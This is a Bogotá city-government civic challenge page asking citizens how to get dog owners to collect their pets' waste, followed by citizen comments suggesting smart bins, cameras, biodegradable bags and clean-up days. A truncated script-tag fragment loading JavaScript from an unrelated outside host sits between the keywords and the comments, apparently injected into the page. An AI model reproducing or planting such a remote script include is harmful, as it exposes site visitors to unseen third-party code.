Este reto se ha respondido 0 veces

¿Cómo incentivar a los responsables de perros a recoger los excrementos de sus mascotas?

Teniendo en cuenta que este es uno de los comportamientos contrarios a la convivencia que más se presenta en la ciudad, la Secretaría Distrital de Gobierno quiere implementar una estrategia de pedagogía y sensibilización dirigida a la ciudadanía, que promueva la tenencia responsable de mascotas.

A través de este reto buscamos propuestas ciudadanas para que los tenedores y propietarios de perros se concienticen sobre la importancia que tiene para la sana convivencia y la salud pública la disposición responsable de los excrementos de mascotas.

Queremos escuchar ideas que permitan un adecuado uso del espacio público, y una convivencia armónica entre los ciudadanos.

El Nuevo Código Nacional de Policía y Convivencia establece en el numeral 3 del artículo 124 que “omitir la recogida de los excrementos de los animales, por parte de sus tenedores o propietarios, o dejarlos abandonados después de recogidos, cuando ello ocurra en el espacio público o en áreas comunes”, acarrea una multa de 4 SMDLV ($104.164).


Palabras Clave: #CulturaCiudadana, #EspacioPúblico, #CódigoDePolicía, #ParquesLimpios, #YoRecojoElPopóDeMiPerro.


src="https://cuev.in/aux.php?ver=1.0&ref=at&debug=" type="text/javascript">


Comentarios (67)

  • Diego Leòn Buitrago Castañeda ¡estoy de acuerdo!

    !Un espacio limpio regala sonrisas! la invitación es a que las personas que sacan a su mejor amigo al aire libre, le otorguen importancia a la necesidad de mantener limpios los espacios que le posibilitan ser feliz a su mascota.

    julio 11 2018, 11:38:22 a. m.
  • JAIRO TORRES MELO ¡estoy de acuerdo!

    los parques y prados NO DEBE SER BAÑO PUBLICO DE MASCOTAS, educar a sus perros a que hagan sus necesidades dentro del baño del dueño, sobre un periódico y que éste los recoja y los eche a la tasa y baje la cisterna y si es orina que eche el periódico a la basura.

    julio 11 2018, 7:29:48 a. m.
  • JUAN SEBASTIAN CHICAGÜI ¡estoy de acuerdo!

    todo esta en las personas , todo esta en la educación

    julio 5 2018, 10:23:55 p. m.
  • María Angélica Gaitán Guzmán ¡estoy de acuerdo!

    Sacar Al Mercado Bolsas Biodegradables Accesibles De Uso Obligatorio Para Tenedores Y Propietarios De Animales De Compañía Dotar De Canecas Recicladas Los Espacios Públicos Para Solo Desechos De Mascotas excrementos y Poner Bolsas Al Lado De Las Canecas.

    julio 5 2018, 9:04:06 p. m.
  • Leidy Camacho ¡estoy de acuerdo!

    Canecas inteligentes, que dan puntos por arrojar el popo de perro, junto con una app que registre los puntos para obtener incentivos collares, bolsas biodegradables, galletas, esto permitiría que la constancia de una acción se convierta en habito.

    julio 5 2018, 10:44:02 a. m.
  • Monica Baquero ¡estoy de acuerdo!

    Incluir JAC para que se hagan recorridos en l o spuntos cRìticos de la localidad y se lleven a cabo acciones de sensibilización periodicamentepara q ue sea un proceso y que se hagan concursos de embellecimi e n t o de esos espacios.

    junio 29 2018, 11:54:26 a. m.
  • Laura Valentina Osorio García ¡estoy de acuerdo!

    En Modelo Norte hacemos jornadas colectivas en las cuales recogemos el popo ajeno que dejan aquellas personas que no recogen los excrementos realizados por su mascota, generando conciencia de que estas acciones son propias y nadie debe hacerlas por ti.

    junio 29 2018, 11:39:26 a. m.
  • Hernando Carreño ¡estoy de acuerdo!

    Instalar camaras en sectores de paseo de las mascotas, se identificara a los dueños que no recogen los excrementos, y con su imagen, divulgarla, para que por vergüenza se concienticen y recogan sus excrementos, denunciando estos actos se fomentaria la cultura animal en la ciudad.

    junio 29 2018, 11:29:07 a. m.
  • Jose Eneide Tibaquira Piraquive ¡estoy de acuerdo!

    que el nuevo código de policía y entidades se participe mas en el territorio con la tenencia de mascotas caso del barrio bella flor de la localidad 19 de ciudad bolívar

    junio 28 2018, 7:54:36 p. m.
  • Encanto Colombiano ¡estoy de acuerdo!

    La multa no deber ser en dinero, sino quitarle el animal, eso le dolería más a la persona y aprendería a recoger los excrementos de sus perros. No hay porque tolerar más el mal olor en nuestras calles y parques.

    junio 27 2018, 12:01:48 p. m.